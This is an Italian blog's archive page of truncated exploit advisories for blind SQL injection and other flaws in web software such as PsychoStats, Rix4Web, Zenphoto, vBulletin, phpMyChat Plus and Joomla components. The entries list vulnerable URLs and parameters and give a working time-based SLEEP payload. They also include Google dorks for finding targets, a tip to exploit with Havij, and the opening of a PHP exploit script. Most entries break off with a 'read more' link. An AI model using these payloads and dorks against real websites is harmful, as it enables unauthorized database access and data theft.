PsychoStats 3.2.2b Blind SQL Injection

29 marzo 2013 - Fonte: http://www.mondounix.com 
Exploit Title :  PsychoStats awards.php blind SQL Injection
==============
Date: 27/03/2013 00:50
=====
Author: Mohamed from ALG
======
Vendor or Software Link:http://psychostats.us/
=======================
Version: 3.2.2b
========
Category: webapps
=========
Google Keywords: "Powered by PsychoStats 3.2.2b"
===============
contact: senderberd[at]gmail.com
========
 
exploit:
========
 
http://server/awards.php?d=YYYY-MM-DD{Inject hier your blind SQL injection}
 
 
Use Havij to easy exploit
Enjoy
 
 
S.Th To a El Koyot
 
end
...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , ,

Rix4Web Portal Remote Blind SQL Injection

24 febbraio 2013 - Fonte: http://www.mondounix.com 
################################################
### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
### Date: 02/23/2013 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.rix4web.com/
### Software Link: http://www.traidnt.net/vb/traidnt2230161/
### Tested on: Linux/Windows 
################################################
 
# AND time-based blind In POST:
 
POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add
 
cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.
 
# Just inject : dir_link
 
################################################
 
#...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , ,

Zenphoto 1.4.4.1 Blind SQL Injection

21 febbraio 2013 - Fonte: http://www.mondounix.com 
######################################################################################
#                                                                                    #
# Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection                           #
#                                                                                    #
# Author        : HosseinNsn                                                         #
#                                                                                    #
# Home          : http://Emperor-Team.Org                                            #
#                                                                                    #
# Software Link : http://www.zenphoto.org     ...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , ,

Paypal.com Blind SQL Injection

23 gennaio 2013 - Fonte: http://www.mondounix.com 
Title:
======
Paypal Bug Bounty #18 - Blind SQL Injection Vulnerability
 
 
Date:
=====
2013-01-22
 
 
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=673
 
http://news.softpedia.com/news/PayPal-Addresses-Blind-SQL-Injection-Vulnerability-After-Being-Notified-by-Experts-323053.shtml
 
 
VL-ID:
=====
673
 
 
Common Vulnerability Scoring System:
====================================
8.3
 
 
Introduction:
=============
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , ,

vBulletin 3.x / 4.x AjaxReg SQL Injection

10 dicembre 2012 - Fonte: http://www.mondounix.com 
#!/usr/bin/php
<?
 
# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://lh3.googleusercontent.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.youtube.com/watch?v=LlKaYyJxH7E
# check it : http://localhost/vBulletin/clientscript/register.js
 
function usage ()
{
    echo
        "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
        "\n[+] Author: Cold z3ro".
        "\n[+] Site  : http://www.hackteach.org | http://www.s3curi7y.com".
        "\n[+] vandor: http://www.vbulletin.org/forum/showthread.php?t=144869".
        "\n[+] Usage : php 0day.php <hostname>...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , ,

Midwest Marketing (display_products.php) Blind SQL Vulnerability

12 novembre 2012 - Fonte: http://www.mondounix.com 
#########################################################################
# Exploit Title: [ Midwest Marketing (display_products.php) Blind SQL Vulnerability ]                
# Date: [12-11-2012]                                                   
# Author: [ShinoBi-Dz]
# E-mail : ShinoBiDz442@gmail.com                                      
# Facebook : https://www.facebook.com/shinobi.DZz                     
# Category: [webapps]                                                   
# Google dork: "Designed by Midwest Marketing, LLC" inurl:display_products.php?id=
# Tested on: [Windows 7 ]                                              
#########################################################################
 
[~]Exploit/p0c...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , ,

netOffice Dwins 1.4p3 SQL Injection

12 novembre 2012 - Fonte: http://www.mondounix.com 
:::::::-.   ...    ::::::.    :::.
  ;;,   `';, ;;     ;;;`;;;;,  `;;;
  `[[     [[[['     [[[  [[[[[. '[[
   $$,    $$$$      $$$  $$$ "Y$c$$
   888_,o8P'88    .d888  888    Y88
   MMMMP"`   "YmmMMMM""  MMM     YM
 
  [ Discovered by dun \ posdub[at]gmail.com ]
  [ 2012-11-08                              ]
#################################################################
#  [ netOffice Dwins <= 1.4p3 ]  SQL Injection Vulnerability    #
#################################################################
#
# Script: "netOffice Dwins is a free web based time tracking, timesheet,
#          content management, issue tracking, and project management environment."
#
# Vendor:   http://sourceforge.net/projects/netofficedwins/
#...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , ,

phpMyChat Plus 1.94 RC1 LFI / XSS / RFI / SQL Injection

5 ottobre 2012 - Fonte: http://www.mondounix.com 
############################################
### Exploit Title: phpMyChat Plus v1.94 RC1 Multiple Remote Vulnerabilities
### Date: 04/10/2012 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://sourceforge.net/projects/phpmychat/
### Software Link: http://sourceforge.net/projects/phpmychat/files/latest/download
### Version: 1.94 RC1
### Tested on: Linux/Windows 
############################################
 
1- Remote Blind SQL Injection :
 
# P.O.C :
 
http://localhost/plus/users_popuph.php?B=1&From=remotelogin.php&L=hebrew&LastCheck=[Blind SQL]
 
----------------------------------------------------------------------------------------
 
2-...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , , , , , ,

Joomla RokModule Component (index.php, module parameter) Blind SQLi

10 settembre 2012 - Fonte: http://www.mondounix.com 
Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability
 
Nombre del Componente: Com_rokmodule
 
Empresa: http://www.rockettheme.com/
 
Testeado: Linux Backtrack
 
Autor: Yarolinux Para WebSecurityDev
Twitter: @Yarolinux
 
Fecha: 09/09/2012
 
Bueno la Injeccion Va de la siguiente manera:
 
http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]
 
http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]
 
 
Ok! Eso es todo Difrutenlo!
 
Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy
pronto resultados :D
 
Greetz: Dylan Irzi & WebSecurityDev
...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , , ,

Joomla Component (com_icagenda) Blind SQLi/Path Disclosure

2 settembre 2012 - Fonte: http://www.mondounix.com 
# Exploit Title: Joomla Component (com_icagenda) Blind SQLi/Path Disclosure . 
# Date: 31 August 2012
# Author: Dark-Puzzle (Souhail Hammou)
# Risk : Critical
# Version: All Versions
# Google Dork : N/A
# Category: Webapps/0day
# Tested on: Windows Xp Sp2 Fr .
# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...
***************************************************************************************
Info :
 
Icagenda is a New Component for Event Management with a calendar module.
----------------------------------------------------
I - Blind SQL Injection Vulnerability 
----------------------------------------------------
 
	Vulnerability :
 
	"id" parameter...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , , ,